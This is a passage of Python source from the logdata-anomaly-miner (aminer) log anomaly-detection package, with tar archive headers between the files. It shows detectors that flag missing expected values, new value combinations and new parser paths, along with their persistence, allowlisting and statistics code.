transition time: {list(event_data[0])} - {list(event_data[1])}, {float(event_data[2])}" old_transition_time = self.time_matrix[event_value_1][event_value_2] self.time_matrix[event_value_1][event_value_2] = float(event_data[2]) return f"Changed transition time {list(event_data[0])} - {list(event_data[1])} from {old_transition_time} to {float(event_data[2])}" def remove_from_persistence_event(self, event_type, event_data): """Removes the information of event_data from the persistence of component_name. @return a message with information about the removal from the persistence. @throws Exception when the addition of this special event using given event_data was not possible. """ if event_type != f"Analysis.{self.__class__.__name__}": msg = "Event not from this source" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) # Query if event_data has the stated format if not (len(event_data) == 2 and isinstance(event_data[0], list) and isinstance(event_data[1], list) and len(event_data[0]) == len(self.target_path_list) and len(event_data[1]) == len(self.target_path_list) and all(isinstance(value, str) for value in event_data[0]) and all(isinstance(value, str) for value in event_data[1])): msg = "Event_data has the wrong format. " \ "The supported format is [path_value_list_1, path_value_list_2], " \ "where the path value lists are lists of strings with the same length as the defined paths in the config." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) # Convert path value lists to tuples event_data[0] = tuple(event_data[0]) event_data[1] = tuple(event_data[1]) # Check in which order the event_values appear in the time matrix event_value_1 = None event_value_2 = None if event_data[0] in self.time_matrix and event_data[1] in self.time_matrix[event_data[0]]: event_value_1 = event_data[0] event_value_2 = event_data[1] elif event_data[1] in self.time_matrix and event_data[0] in self.time_matrix[event_data[1]]: event_value_1 = event_data[1] event_value_2 = event_data[0] # Check if the transition time between the path values exists if event_value_1 is None: string = f"Transition time for {list(event_data[0])} - {list(event_data[1])} does not exist and therefore could not be deleted." else: # Delete the transition time deleted_time = self.time_matrix[event_value_1].pop(event_value_2) # Delete the entry to event_value_1 if it is empty if self.time_matrix[event_value_1] == {}: self.time_matrix.pop(event_value_1) string = f"Deleted transition time {list(event_data[0])} - {list(event_data[1])}: {deleted_time}." return string def blocklist_event(self, event_type, event_data, blocklisting_data): """Blocklist an event generated by this source using the information emitted when generating the event. @return a message with information about blocklisting @throws Exception when blocklisting of this special event using given blocklisting_data was not possible. """ if event_type != f"Analysis.{self.__class__.__name__}": msg = "Event not from this source" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if blocklisting_data is not None: msg = "Blocklisting data not understood by this detector" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if event_data not in self.ignore_list: self.ignore_list.append(event_data) return f"Blocklisted path {event_data} in {event_type}." def print(self, message, log_atom, affected_path, confidence=None, additional_information=None): """Print the message.""" if isinstance(affected_path, str): affected_path = [affected_path] if additional_information is None: additional_information = {} original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) if original_log_line_prefix is None: original_log_line_prefix = "" if self.output_logline: sorted_log_lines = [original_log_line_prefix + log_atom.raw_data.decode()] analysis_component = {"AffectedLogAtomPaths": list(log_atom.parser_match.get_match_dictionary().keys())} else: sorted_log_lines = [log_atom.raw_data.decode()] analysis_component = {"AffectedLogAtomPaths": affected_path} for key, value in additional_information.items(): analysis_component[key] = value event_data = {"AnalysisComponent": analysis_component, "TypeInfo": {}} if confidence is not None: event_data["TypeInfo"]["Confidence"] = confidence for listener in self.anomaly_event_handlers: listener.receive_event(f"Analysis.{self.__class__.__name__}", message, sorted_log_lines, event_data, log_atom, self) MissingMatchPathValueDetector.py000066400000000000000000000525301500476301700372200ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""This module provides the MissingMatchPathValueDetector to generate events when expected values were not seen for an extended period of time. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import logging from aminer.AminerConfig import build_persistence_file_name, DEBUG_LOG_NAME, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD, \ STAT_LOG_NAME from aminer import AminerConfig from aminer.AnalysisChild import AnalysisContext from aminer.events.EventInterfaces import EventSourceInterface from aminer.input.InputInterfaces import AtomHandlerInterface, PersistableComponentInterface from aminer.util import PersistenceUtil from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface class MissingMatchPathValueDetector( AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface, PersistableComponentInterface): """This class creates events when an expected value is not seen within a given timespan. For example because the service was deactivated or logging disabled unexpectedly. This is complementary to the function provided by NewMatchPathValueDetector. For each unique value extracted by paths, a tracking record is added to expected_values_dict. It stores three numbers: the timestamp the extracted value was last seen, the maximum allowed gap between observations and the next alerting time when currently in error state. When in normal (alerting) state, the value is zero. """ time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, target_path_list, anomaly_event_handlers, persistence_id="Default", learn_mode=False, default_interval=3600, realert_interval=86400, combine_values=True, output_logline=True, stop_learning_time=None, stop_learning_no_anomaly_time=None, log_resource_ignore_list=None): """Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that all values occurring in these paths are considered for value range generation. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param persistence_id name of persistence file. @param learn_mode specifies whether new expected values should be learned. @param default_interval time in seconds before a value is reported missing. The parameter is applied to the parsed record data time, not the system time. Hence, reports can be delayed when no data is received. @param realert_interval time in seconds before a value is reported missing for a second time. The parameter is applied to the parsed record data time, not the system time. Hence, reports can be delayed when no data is received. @param combine_values if true the combined values are identifiers. When false, individual values are checked. @param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. """ # avoid "defined outside init" issue self.learn_mode, self.stop_learning_time, self.next_persist_time, self.log_success, self.log_total = [None]*5 self.stop_learning_time_initialized = None super().__init__( aminer_config=aminer_config, target_path_list=target_path_list, anomaly_event_handlers=anomaly_event_handlers, persistence_id=persistence_id, learn_mode=learn_mode, default_interval=default_interval, realert_interval=realert_interval, output_logline=output_logline, combine_values=combine_values, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time, log_resource_ignore_list=log_resource_ignore_list, mutable_default_args=["log_resource_ignore_list"] ) # This timestamp is compared with timestamp values from log atoms for activation of alerting logic. The first timestamp from logs # above this value will trigger alerting. self.next_check_timestamp = 0 self.last_seen_timestamp = 0 self.log_learned_values = 0 self.log_new_learned_values = [] if not self.target_path_list: msg = "target_path_list must not be None or empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) self.expected_values_dict = {} self.load_persistence_data() self.analysis_string = "Analysis.%s" def receive_atom(self, log_atom): """Receive a log atom from a source. @param log_atom binary raw atom data @return True if this handler was really able to handle and process the atom. Depending on this information, the caller may decide if it makes sense passing the atom also to other handlers or to retry later. This behaviour has to be documented at each source implementation sending log atoms. """ for source in self.log_resource_ignore_list: if log_atom.source.resource_name.decode() == source: return False self.log_total += 1 if not self.stop_learning_time_initialized: self.stop_learning_time_initialized = True if self.stop_learning_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_time elif self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_no_anomaly_time if self.learn_mode is True and self.stop_learning_time is not None and self.stop_learning_time < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__) self.learn_mode = False value = self.get_channel_key(log_atom) if value is None or (not value[0] and not value[1]): return False target_paths, value_list = value if isinstance(target_paths, str) and isinstance(value_list, str): target_paths = [target_paths] value_list = [value_list] timestamp = log_atom.get_timestamp() for i, target_path in enumerate(target_paths): value = value_list[i] detector_info = self.expected_values_dict.get(value) if detector_info is None and self.learn_mode: self.expected_values_dict[value] = [timestamp, self.default_interval, 0, target_path] self.next_check_timestamp = min(self.next_check_timestamp, timestamp + self.default_interval) self.log_learned_values += 1 self.log_new_learned_values.append(value) if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = max(self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time) self.check_timeouts(timestamp, log_atom) for i, target_path in enumerate(target_paths): value = value_list[i] detector_info = self.expected_values_dict.get(value) if detector_info is not None: # Just update the last seen value and switch from non-reporting error state to normal state. detector_info[0] = timestamp if detector_info[2] != 0: if timestamp >= detector_info[2]: detector_info[2] = 0 # Delta of this detector might be lower than the default maximum recheck time. self.next_check_timestamp = min(self.next_check_timestamp, timestamp + detector_info[1]) self.log_success += 1 return True def get_channel_key(self, log_atom): """Get the key identifying the channel this log_atom is coming from.""" value_list = [] path_list = [] for target_path in self.target_path_list: match = log_atom.parser_match.get_match_dictionary().get(target_path) if match is None: if self.combine_values: return None continue matches = [] if isinstance(match, list): matches = match else: matches.append(match) for match in matches: if isinstance(match.match_object, bytes): affected_log_atom_values = match.match_object.decode(AminerConfig.ENCODING) else: affected_log_atom_values = match.match_object value_list.append(str(affected_log_atom_values)) path_list.append(target_path) if self.combine_values: value_list = str(value_list) path_list = str(path_list) return path_list, value_list def check_timeouts(self, timestamp, log_atom): """Check if there was any timeout on a channel, thus triggering event dispatching.""" old_last_seen_timestamp = self.last_seen_timestamp self.last_seen_timestamp = max(self.last_seen_timestamp, timestamp) if self.last_seen_timestamp > self.next_check_timestamp: missing_value_list = [] # Start with a large recheck interval. It will be lowered if any of the expectation intervals is below that. if self.next_check_timestamp == 0: self.next_check_timestamp = self.last_seen_timestamp + self.realert_interval for value, detector_info in self.expected_values_dict.items(): value_overdue_time = int(self.last_seen_timestamp - detector_info[0] - detector_info[1]) if detector_info[2] != 0: next_check_delta = detector_info[2] - self.last_seen_timestamp if next_check_delta > 0: # Already alerted but not ready for realerting yet. self.next_check_timestamp = min(self.next_check_timestamp, detector_info[2]) continue else: # No alerting yet, see if alerting is required. if value_overdue_time < 0: old = self.next_check_timestamp self.next_check_timestamp = min(self.next_check_timestamp, self.last_seen_timestamp - value_overdue_time) if old > self.next_check_timestamp or self.next_check_timestamp < detector_info[2]: break # avoid early re-alerting if value_overdue_time > 0: missing_value_list.append([detector_info[3], value, value_overdue_time, detector_info[1]]) # Set the next alerting time. detector_info[2] = self.last_seen_timestamp + self.realert_interval self.expected_values_dict[value] = detector_info # Workaround: # also check for long gaps between same tokens where the last_seen_timestamp gets updated # on the arrival of tokens following a longer gap elif self.last_seen_timestamp - detector_info[0] > detector_info[1]: value_overdue_time = self.last_seen_timestamp - old_last_seen_timestamp - detector_info[1] missing_value_list.append([detector_info[3], value, value_overdue_time, detector_info[1]]) # Set the next alerting time. detector_info[2] = self.last_seen_timestamp + self.realert_interval self.expected_values_dict[value] = detector_info if missing_value_list: if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = max(self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time) message_part = [] affected_log_atom_values = [] for target_path_list, value, overdue_time, interval in missing_value_list: e = {} try: if isinstance(value, list): data = [] for val in value: if isinstance(val, bytes): data.append(val.decode(AminerConfig.ENCODING)) else: data.append(val) data = str(data) else: if isinstance(value, bytes): data = value.decode(AminerConfig.ENCODING) else: data = repr(value) except UnicodeError: data = repr(value) if self.__class__.__name__ == "MissingMatchPathValueDetector": e["TargetPathList"] = target_path_list message_part.append(f" {target_path_list}: {data} overdue {overdue_time}s (interval {interval})\n") else: target_paths = "" for target_path in self.target_path_list: target_paths += target_path + ", " e["TargetPathList"] = self.target_path_list message_part.append(f" {target_paths[:-2]}: {data} overdue {overdue_time}s (interval {interval})\n") e["Value"] = str(value) e["OverdueTime"] = str(overdue_time) e["Interval"] = str(interval) affected_log_atom_values.append(e) affected_log_atom_paths = [] for path in log_atom.parser_match.get_match_dictionary().keys(): if path in self.target_path_list: affected_log_atom_paths.append(path) analysis_component = {"AffectedLogAtomPaths": affected_log_atom_paths, "AffectedLogAtomValues": affected_log_atom_values} event_data = {"AnalysisComponent": analysis_component} for listener in self.anomaly_event_handlers: self.send_event_to_handlers(listener, event_data, log_atom, ["".join(message_part).strip()]) return True def send_event_to_handlers(self, anomaly_event_handler, event_data, log_atom, message_part): """Send an event to the event handlers.""" anomaly_event_handler.receive_event(self.analysis_string % self.__class__.__name__, "Interval too large between values", message_part, event_data, log_atom, self) def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = trigger_time + delta return delta def load_persistence_data(self): """Load the persistence data from storage.""" PersistenceUtil.add_persistable_component(self) persistence_data = PersistenceUtil.load_json(self.persistence_file_name) if persistence_data is not None: for key in persistence_data: value = persistence_data[key] if self.target_path_list is not None: if (value[3] not in self.target_path_list and not self.combine_values) or ( value[3] != str(self.target_path_list) and self.combine_values and not isinstance(self, MissingMatchPathListValueDetector)): continue elif self.target_path_list is not None and value[3] not in self.target_path_list: continue if value[1] != self.default_interval: value[1] = self.default_interval value[2] = value[0] + self.default_interval self.expected_values_dict[key] = value logging.getLogger(DEBUG_LOG_NAME).debug("%s loaded persistence data.", self.__class__.__name__) def do_persist(self): """Immediately write persistence data to storage.""" PersistenceUtil.store_json(self.persistence_file_name, self.expected_values_dict) logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__) def allowlist_event(self, event_type, event_data, allowlisting_data): """Allowlist an event generated by this source using the information emitted when generating the event. @return a message with information about allowlisting using given allowlisting_data was not possible. """ if event_type != self.analysis_string % self.__class__.__name__: msg = "Event not from this source" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if not isinstance(allowlisting_data, int): msg = "Allowlisting data has to be an integer with new interval, -1 to reset to defaults, other negative value to remove the" \ " entry" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) new_interval = allowlisting_data if new_interval == -1: new_interval = self.default_interval if new_interval < 0: del self.expected_values_dict[event_data[0]] logging.getLogger(DEBUG_LOG_NAME).debug("%s removed check value %s.", self.__class__.__name__, str(event_data[0])) else: self.expected_values_dict[event_data[0]] = [self.last_seen_timestamp, new_interval, 0, event_data[1]] self.next_check_timestamp = 0 return f"Updated '{event_data[0]}' in '{event_data[1]}' to new interval {new_interval}." def log_statistics(self, component_name): """Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler. @param component_name the name of the component which is printed in the log line. """ if AminerConfig.STAT_LEVEL == 1: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %d out of %d log atoms successfully and learned %d new values in the last 60 minutes.", component_name, self.log_success, self.log_total, self.log_learned_values) elif AminerConfig.STAT_LEVEL == 2: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %d out of %d log atoms successfully and learned %d new values in the last 60 minutes. Following new values" " were learned: %s", component_name, self.log_success, self.log_total, self.log_learned_values, self.log_new_learned_values) self.log_success = 0 self.log_total = 0 self.log_learned_values = 0 self.log_new_learned_values = [] class MissingMatchPathListValueDetector(MissingMatchPathValueDetector): """This detector works similar to the MissingMatchPathValueDetector. It only can look up values from a list of paths until one path really exists. It then uses this value as key to detect log atoms belonging to the same data stream. This is useful when e.g. due to different log formats, the hostname, servicename or any other relevant channel identifier has alternative paths. """ def get_channel_key(self, log_atom): """Get the key identifying the channel this log_atom is coming from.""" for target_path in self.target_path_list: match_element = log_atom.parser_match.get_match_dictionary().get(target_path) if match_element is None: continue if isinstance(match_element.match_object, bytes): affected_log_atom_values = match_element.match_object.decode(AminerConfig.ENCODING) else: affected_log_atom_values = match_element.match_object return target_path, str(affected_log_atom_values) return None def send_event_to_handlers(self, anomaly_event_handler, event_data, log_atom, message_part): """Send an event to the event handlers.""" anomaly_event_handler.receive_event(self.analysis_string % self.__class__.__name__, "Interval too large between values", message_part, event_data, log_atom, self) NewMatchIdValueComboDetector.py000066400000000000000000000366461500476301700367720ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""This file defines the NewMatchIdValueComboDetector. detector to extract values from multiple LogAtoms and check, if the value combination was already seen before. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import os import logging from aminer.AminerConfig import build_persistence_file_name, DEBUG_LOG_NAME, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD, \ STAT_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX from aminer import AminerConfig from aminer.AnalysisChild import AnalysisContext from aminer.events.EventInterfaces import EventSourceInterface from aminer.input.InputInterfaces import AtomHandlerInterface, PersistableComponentInterface from aminer.util import PersistenceUtil from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface class NewMatchIdValueComboDetector( AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface, PersistableComponentInterface): """This class creates events when a new value combination for a given list of match data. Paths need to be found in log atoms with the same id value in a specific path. """ time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, target_path_list, anomaly_event_handlers, id_path_list, min_allowed_time_diff, persistence_id="Default", allow_missing_values_flag=False, learn_mode=False, output_logline=True, stop_learning_time=None, stop_learning_no_anomaly_time=None, log_resource_ignore_list=None): """Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param target_path_list the list of values to extract from each match to create the value combination to be checked. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param id_path_list the list of paths where id values can be stored in all relevant log event types. @param min_allowed_time_diff the minimum amount of time in seconds after the first appearance of a log atom with a specific id that is waited for other log atoms with the same id to occur. The maximum possible time to keep an incomplete combo is 2*min_allowed_time_diff @param persistence_id name of persistence file. @param allow_missing_values_flag when set to True, the detector will also use matches, where one of the paths from target_path_list does not refer to an existing parsed data object. @param learn_mode when set to True, this detector will report a new value only the first time before including it in the known values set automatically. @param output_logline specifies whether the full parsed log atom should be provided in the output. @param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. """ # avoid "defined outside init" issue self.learn_mode, self.stop_learning_time, self.next_persist_time, self.log_success, self.log_total = [None]*5 self.stop_learning_time_initialized = None super().__init__( aminer_config=aminer_config, target_path_list=target_path_list, anomaly_event_handlers=anomaly_event_handlers, id_path_list=id_path_list, min_allowed_time_diff=min_allowed_time_diff, persistence_id=persistence_id, allow_missing_values_flag=allow_missing_values_flag, learn_mode=learn_mode, output_logline=output_logline, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time, log_resource_ignore_list=log_resource_ignore_list, mutable_default_args=["log_resource_ignore_list"] ) if not self.target_path_list: msg = "target_path_list must not be None or empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if not self.id_path_list: msg = "id_path_list must not be None or empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) self.log_learned_path_value_combos = 0 self.log_new_learned_values = [] self.known_values = [] self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) self.load_persistence_data() self.id_dict_current = {} self.id_dict_old = {} self.next_shift_time = None def receive_atom(self, log_atom): """Receive on parsed atom and the information about the parser match. @return True if a value combination was extracted and checked against the list of known combinations, no matter if the checked values were new or not. """ for source in self.log_resource_ignore_list: if log_atom.source.resource_name.decode() == source: return False self.log_total += 1 if not self.stop_learning_time_initialized: self.stop_learning_time_initialized = True if self.stop_learning_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_time elif self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_no_anomaly_time match_dict = log_atom.parser_match.get_match_dictionary() if self.learn_mode is True and self.stop_learning_time is not None and self.stop_learning_time < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__) self.learn_mode = False id_match_element = None for id_path in self.id_path_list: # Get the id value and return if not found in this log atom. id_match_element = match_dict.get(id_path) if id_match_element is not None: break if id_match_element is None: return False timestamp = log_atom.get_timestamp() if timestamp is not None: if self.next_shift_time is None: self.next_shift_time = timestamp + self.min_allowed_time_diff if timestamp > self.next_shift_time: # Every min_allowed_time_diff seconds, process all combinations from id_dict_old and then override id_dict_old with # id_dict_current. This guarantees that incomplete combos are hold for at least min_allowed_time_diff seconds before # proceeding. self.next_shift_time = timestamp + self.min_allowed_time_diff if self.allow_missing_values_flag: for id_old in self.id_dict_old: self.process_id_dict_entry(self.id_dict_old[id_old], log_atom) self.id_dict_old = self.id_dict_current self.id_dict_current = {} if isinstance(id_match_element, list): id_match_object = [] for match_element in id_match_element: id_match_object.append(match_element.match_object) id_match_object = tuple(id_match_object) else: id_match_object = id_match_element.match_object # Find dictionary containing id and create ref to old or current dict (side effects) id_dict = None if id_match_object in self.id_dict_current: id_dict = self.id_dict_current elif id_match_object in self.id_dict_old: id_dict = self.id_dict_old else: id_dict = self.id_dict_current id_dict[id_match_object] = {} for target_path in self.target_path_list: # Append values to the combo. match_element = match_dict.get(target_path) if match_element is not None: if isinstance(match_element, list): values = [] matches = match_element for match_element in matches: if isinstance(match_element.match_object, bytes): values.append(match_element.match_object.decode(AminerConfig.ENCODING)) else: values.append(id_dict[id_match_object][target_path]) id_dict[id_match_object][target_path] = values else: if isinstance(match_element.match_object, bytes): id_dict[id_match_object][target_path] = match_element.match_object.decode(AminerConfig.ENCODING) else: id_dict[id_match_object][target_path] = match_element.match_object if len(id_dict[id_match_object]) == len(self.target_path_list): # Found value for all target paths. No need to wait more. self.process_id_dict_entry(id_dict[id_match_object], log_atom) del id_dict[id_match_object] self.log_success += 1 return True def process_id_dict_entry(self, id_dict_entry, log_atom): """Process an entry from the id_dict.""" if id_dict_entry not in self.known_values: # Combo is unknown, process and raise anomaly if self.learn_mode: self.known_values.append(id_dict_entry) self.log_learned_path_value_combos += 1 self.log_new_learned_values.append(id_dict_entry) if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = max(self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time) analysis_component = {"AffectedLogAtomValues": [str(i) for i in list(id_dict_entry.values())]} event_data = {"AnalysisComponent": analysis_component} try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) if self.output_logline: sorted_log_lines = [log_atom.parser_match.match_element.annotate_match("") + os.linesep + repr( id_dict_entry) + os.linesep + original_log_line_prefix + data] else: sorted_log_lines = [repr(id_dict_entry)] for listener in self.anomaly_event_handlers: listener.receive_event(f"Analysis.{self.__class__.__name__}", "New value combination(s) detected", sorted_log_lines, event_data, log_atom, self) def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = trigger_time + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" PersistenceUtil.store_json(self.persistence_file_name, self.known_values) logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__) def load_persistence_data(self): """Load the persistence data from storage.""" persistence_data = PersistenceUtil.load_json(self.persistence_file_name) if persistence_data is not None: # Combinations are stored as list of dictionaries for record in persistence_data: self.known_values.append(record) logging.getLogger(DEBUG_LOG_NAME).debug("%s loaded persistence data.", self.__class__.__name__) PersistenceUtil.add_persistable_component(self) def allowlist_event(self, event_type, event_data, allowlisting_data): """Allowlist an event generated by this source using the information emitted when generating the event. @return a message with information about allowlisting @throws Exception when allowlisting of this special event using given allowlisting_data was not possible. """ if event_type != f"Analysis.{self.__class__.__name__}": msg = "Event not from this source" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if allowlisting_data is not None: msg = "Allowlisting data not understood by this detector" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if not isinstance(event_data, dict) or len(event_data) != len(self.target_path_list) or \ not all(x in self.target_path_list for x in event_data.keys()) or \ not all(not isinstance(x, bytes) for x in event_data.values()): msg = "event_data has to be of type dict and the values should not be bytes." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if not self.allow_missing_values_flag and None in event_data.values(): msg = "event_data must not have None values if allow_missing_values_flag is False." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if event_data not in self.known_values: self.known_values.append(event_data) return f"Allowlisted path(s) {', '.join(self.target_path_list)} with {event_data}." def log_statistics(self, component_name): """Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler. @param component_name the name of the component which is printed in the log line. """ if AminerConfig.STAT_LEVEL == 1: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %d out of %d log atoms successfully and learned %s new value combinations in the last 60 minutes.", component_name, self.log_success, self.log_total, self.log_learned_path_value_combos) elif AminerConfig.STAT_LEVEL == 2: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %d out of %d log atoms successfully and learned %d new value combinations in the last 60 minutes. Following" " new value combinations were learned: %s", component_name, self.log_success, self.log_total, self.log_learned_path_value_combos, self.log_new_learned_values) self.log_success = 0 self.log_total = 0 self.log_learned_path_value_combos = 0 self.log_new_learned_values = [] NewMatchPathDetector.py000066400000000000000000000232471500476301700353460ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""This module defines a detector for new data paths. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import os import logging from aminer.AminerConfig import build_persistence_file_name, DEBUG_LOG_NAME, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD, \ STAT_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX from aminer import AminerConfig from aminer.AnalysisChild import AnalysisContext from aminer.events.EventInterfaces import EventSourceInterface from aminer.input.InputInterfaces import AtomHandlerInterface, PersistableComponentInterface from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface from aminer.util import PersistenceUtil class NewMatchPathDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface, PersistableComponentInterface): """This class creates events when new data path was found in a parsed atom.""" time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, persistence_id="Default", learn_mode=False, output_logline=True, stop_learning_time=None, stop_learning_no_anomaly_time=None, log_resource_ignore_list=None): """Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param persistence_id name of persistence file. @param learn_mode specifies whether new values should be learned. @param output_logline specifies whether the full parsed log atom should be provided in the output. @param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. """ # avoid "defined outside init" issue self.learn_mode, self.stop_learning_time, self.next_persist_time, self.log_success, self.log_total = [None]*5 self.stop_learning_time_initialized = None super().__init__( aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, persistence_id=persistence_id, learn_mode=learn_mode, output_logline=output_logline, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time, log_resource_ignore_list=log_resource_ignore_list, mutable_default_args=["log_resource_ignore_list"] ) self.log_learned_paths = 0 self.log_new_learned_paths = [] self.known_path_set = set() self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) self.load_persistence_data() def receive_atom(self, log_atom): """Receive on parsed atom and the information about the parser match. @param log_atom the parsed log atom @return True if this handler was really able to handle and process the match. Depending on this information, the caller may decide if it makes sense passing the parsed atom also to other handlers. """ for source in self.log_resource_ignore_list: if log_atom.source.resource_name.decode() == source: return False self.log_total += 1 if not self.stop_learning_time_initialized: self.stop_learning_time_initialized = True if self.stop_learning_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_time elif self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_no_anomaly_time unknown_path_list = [] if self.learn_mode is True and self.stop_learning_time is not None and \ self.stop_learning_time < log_atom.atom_time: 